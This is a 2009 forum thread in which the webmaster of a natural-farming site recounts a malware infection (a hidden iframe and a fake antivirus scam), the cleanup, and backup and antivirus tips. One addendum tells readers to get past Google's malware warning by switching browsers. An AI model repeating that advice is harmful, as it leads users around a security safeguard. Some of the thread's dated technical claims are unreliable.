NEWS ITEM - SITES WERE DOWN DUE TO ATTACKS BY HACKERS

The latest news we have available together with any necessary links. If you have any questions, please use the forum or the contact emails addresses.

Moderator: webmaster

Post Reply
webmaster
Site Admin
Posts: 167
Joined: Mon Aug 22, 2005 6:11 pm
Location: Australia
Contact:

NEWS ITEM - SITES WERE DOWN DUE TO ATTACKS BY HACKERS

Post by webmaster » Mon Sep 21, 2009 8:43 am

Hello,

If you have been seeing strange message when trying to access the forum, you do not need new glasses or a lecture in computer coding.. no, for us it was far worse than that!!

We have not had a good week!

Firstly our main hard drive went down and when we tried to do a back up to a new drive, it too fell over!! This was just the start. A couple of days later when we were just getting everything up again, we were struck by hackers who got into our server. They then changed many of our files and inserted a script which continued to do this no matter how many times we removed and reinstalled them.

Finally, after 1 full week, it looks like we may have got the last of them, although they are insidious little programs which hide under legitimate names and in dark corners of the registry, so they are hard to find and could come back any time.

It is up now, however if one day you see similar messages, just imagine us toiling hour after hour, pulling what hair we have left out, desperately trying to get everything up running again.

These are our terrorists, and their bombs are their evil little programs which constantly roam the internet searching for anything vulnerable to attack.

Once again please enjoy the forum!! :-)

Lonnie
Webmaster
The Forum for Peter Andrew's Natural Sequence Farming

webmaster
Site Admin
Posts: 167
Joined: Mon Aug 22, 2005 6:11 pm
Location: Australia
Contact:

It has been an 8 day week - Beware of Virus and Malware

Post by webmaster » Sat Sep 26, 2009 10:50 am

Well it has sure been 8 days this week! The Beatles or rather John got it right and I remember singing my heart out to it, night after night!!

This is the story...

Out of the blue it happened and even though we had all the firewalls on, pop up blockers and virus programs on our computers, these got in!!

This particular insidious piece of code has several names such as, Packed Revolt, Trojan Horse etc, but is is an 'iframe' which is placed in the code behind what you see on the page.

This code is linked to a site with a .ru (Russian registry) and it then tries to jump from that page to every computer which opens it. It is pure Malware or a Virus!.

A client suggest we look at a site as he wanted one just like it, we did and immediately we clicked on it, we got many screens overlaying each other at a very fast rate and then the screen locked!!

I knew straight away we had been violated however it was now a matter of getting it off the computer it was on before it spread right through our network and to every every site we had.

We rebooted the computer however a screen saver came up saying we had been violated and listed 20 or so virus' which we now on our system. If offer help by suggesting we buy their software called Total Security for $79US and it would clean us up.

I was still able to use the computer programs however I knew once I looked at another page on the Internet, I would infect them.

Using another computer in the office, I did searches on Google and Yahoo to find out more about this Total Security thing and found it was a scam and whilct they did infect you, if you bought their program, it would not be delivered as it did not exist and now they had your payment details as well!

I downloaded some more free programs which they suggested we use to see exactly what was on the computer and together with the ones we already use, spent 2 days just scanning and rescanning all the drives, especially the C Drive where the Windows and Documents and Setting directories are.

At first we came up with several viruses in the directories but more importantly, in the registry hiding amongst all the code. They do this so when you think you have all the files off and you reboot, they are rebuilt again from the registry, so you're virtually back where you started!

They also lodge in the areas of your drives which are set aside for when your system does an auto backup for later restoring purposes and in the areas set aside for the recycle bin. So you see they are very insidious.

I removed most of them by the second day (15 hours) and after several reboots, 3 programs showed the computer was clean.

So you think it was over... But a big 'NO' to that theory!

To set the scene..

This particular computer is the main computer used to access the admin areas of all the many web sites we host for our business clients as well as our own.

We go to our server where the web sites are using a method called 'FTP' which is the main method for up and downloading files to the websites. Everyone has a special user name and password, and it is rather like having a special key to your back door which only your closest of friends can get use on this 'back door'.

As we were way behind on our web site and hosting work we just had to bite the bullet and start doing our 'administration' business. After all as we had a clean computer, we braved it and connected to our server.

Everything went fine until we started to download some files and the warning bells rang telling us it was a virus. Yes that same virus!

To cut the story short as it goes for another 6 days..

The virus had got into our server through someone else's FTP connection and infected many of our own and client's files. This caused them to crash so anyone looking for the page just saw a coded message.

We spent those 6 days changing everyone's passwords a few times and spending hours everyday re-installing the files that had been corrupted, so the site could be online.

Even though we had the sites up, the next morning around 6am it was programmed to once again automatically change those clean files back to corrupted ones, so once again we had to spend the day re-installing from our clean back up.

Over those days, eventually one by one our sites became clean from infection and have stayed up and online.

This morning the last 2 of them showed they were not infected and were still online.

So, it looks like we are now all okay.

What is the lesson here?

In our case, we were just looking at a normal business site which itself had been infected and we got it from them. How it got onto the computer through all our protection, we can only guess it was a 'new' variety which our virus and malware programs
had not yet included in their 'definitions'.

A client had also got it from another source and after uploading his files, our server got it!!

The only thing one can do is the following..

1. Always, always, always have a backup of your files, especially the ones which are important to you. In fact it will also save you a lot of time and frustratyion and money if you have an 'image' or 'clone' copy of your complete C Drive. If it falls over for any reason, you just re-install the image or clone and you have all your programs and file from that drive up and running again.

We use a program called 'Acronis True Image'. (About $70 US) It will do both methods of backup 'images' (take up less space) and clone (needs another full drive).

A backup should be made to an external hard drive and today they as as cheap as chips.. They come in a case and just need to be plugged into your USB port. Get at least a 500 gig which will be able to take you while C drive and others if you want to back them up.

http://www.acronis.com.au/homecomputing/

2. Always have at least 2 Malware anbd Virus pr0grams running, especially for email and web browsers.

We use the very good AVG 8.5 Anti Virus and Anti Spyware program. It picked up 99.99% of our virus'.
http://free.avg.com/

We also use the this very good program which is mainly a Malware program but very good and FREE!
http://www.malwarebytes.org/mbam.php

We also have Adware for scam advertising virus.
http://www.lavasoft.com/products/ad_aware_free.php

You MUST keep up to date with these FREE programs as the ONLY the latest versions get the latest viruses!!

Make sure EVERY DAY, if you use your computer a lot on the Internet, you at least do a scan of your main C Drive by running these programs. They can run at night whilst you sleep at least once a week.
Do NOT run them at the same time.

That's it!

If you haven't scanned your box for a while, do it now and think of what programs and files you have there which would have you devastated if you lost them.

Google and other sources say over the last month (Aug/Sept 2009) the amount of people reporting these problems has multiplied by 10 and going up.


Good Luck!!!


Lonnie
Webmaster
The Forum for Peter Andrew's Natural Sequence Farming

webmaster
Site Admin
Posts: 167
Joined: Mon Aug 22, 2005 6:11 pm
Location: Australia
Contact:

Post by webmaster » Sat Sep 26, 2009 5:08 pm

Hi,

An addendum to the above post..

Google, who have a reporting system run by robots who scan the internet endlessly, found the NSfarming site to have something suspicious on it.

When they find this result, as they currently have over 2 million sites, they install a Warning panel which comes up if you are a user of Google and using Firefox.

If you are are not using Firefox or are not a user of Google then you do not see the panel.

This could be seen as a good service especially if it is instant, however that is not the case. After it is reported it takes a while for them to send an email to the site owner or administrator notifying them of the potential problem.

To get the panel off, one has to clean the site if it is indeed infected, then jump through hoops on a Google site to request them to review it and take the panel down.

Problem is, they say on their site that it could take 90 days to do this.

So, in our case even though we cleaned the site as soon as we were told, we have to wait until they get around to removing the panel.

So... if you're getting Warning panel using Firefox, close it down and use Internet Explorer instead this time. You'll then see all you want to see!

... and on an on we go...

Lonnie
The Forum for Peter Andrew's Natural Sequence Farming

webmaster
Site Admin
Posts: 167
Joined: Mon Aug 22, 2005 6:11 pm
Location: Australia
Contact:

Post by webmaster » Fri Oct 02, 2009 9:12 am

The site has been clear of infections for a week now and was released from the Google/FireFox Warning panel..

Google Diagnostic

We did notice this morning this forum was attacked again, however we caught it in time.

It now seems evident someone for whatever reason, is trying to sabotage the forum. Hopefully it is nothing to do with what we are all about, and just some crazy hacker out there flexing his/her script writing muscles.

We are increasing security even further in the hope this will suffice.

Lonnie
Webmaster
The Forum for Peter Andrew's Natural Sequence Farming

webmaster
Site Admin
Posts: 167
Joined: Mon Aug 22, 2005 6:11 pm
Location: Australia
Contact:

Update Oct 2 11.50am

Post by webmaster » Fri Oct 02, 2009 11:51 am

Well after further diagnosis, and hours after hours of this timewasting, we have found the culprits in the Eastern Europe block however using many addresses.

Slovenia, Hungary, Poland, Romania, Sweeenb, Netherlands just some of them all accessing within seconds of each other.

it continues..

LL
The Forum for Peter Andrew's Natural Sequence Farming

Post Reply